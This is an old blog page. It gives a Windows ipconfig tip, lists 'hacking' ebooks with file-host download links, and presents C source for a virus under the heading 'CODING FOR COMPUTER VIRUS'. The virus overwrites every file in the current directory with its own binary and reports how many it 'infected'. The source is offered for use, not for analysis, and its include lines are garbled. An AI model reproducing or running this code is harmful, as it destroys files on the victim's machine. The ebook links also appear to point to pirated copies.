Wednesday 26 December 2012

View Your Computer's Important Network Information::::: Maybe just for your own information, but certainly when you're troubleshooting a network or Internet problem, you'll probably at some point need to know details about your computer's network connection. everything you'd want to know about your network connection is available somewhere in the Control Panel in Windows, but it's much easier to find, and much better organized, in the results from the ipconfig command. Open Command Prompt and execute ipconfig /all. What displays on screen next is everything important about your network connection: your IP address, hostname, DHCP server, DNS information, and much, much more.......

Hacking Tutorial, Tips and introduction Book.

Hacking Tutorial, Tips and introduction Book. 1. The Hacker's Underground Handbook :- http://www.mediafire.com/?u8653dsudnha5g8 2. The Code Book How to Make It, Break It, Hack It, Crack It :- http://www.mediafire.com/?izyjfvrrb66qzpv 3. Hacking Hugo Cornwall - The Hackers Handbook :- http://www.mediafire.com/download.php?v66rmv9dvdc0er0 4. Hacking-Hackers Secrets Revealed :- http://www.mediafire.com/download.php?psat1adk05kh5wk 5. Hacking- CIA Book of Dirty Tricks :- http://www.mediafire.com/download.php?oiq8g5rsjghx8c7 6. Hacking tips :- http://www.mediafire.com/?asc4jbjymilo45f 7. Hacking - Firewalls And Networks How To Hack Into Remote Computers :- http://www.mediafire.com/?1l5442iacs2z9p3..

CODING FOR COMPUTER VIRUS :::

CODING FOR COMPUTER VIRUS ::: #include #include #include #include #include #include FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(“*.*”,&ffblk,0); while(!done) { virus=fopen(_argv[0],”rb”); host=fopen(ffblk.ff_name,”rb+”); if(host==NULL) goto next; x=89088; printf(“Infecting %s\n”,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(&ffblk); } } printf(“DONE! (Total Files Infected= %d)”,a); end=clock(); printf(“TIME TAKEN=%f SEC\n”, (end-st)/CLK_TCK); getch(); }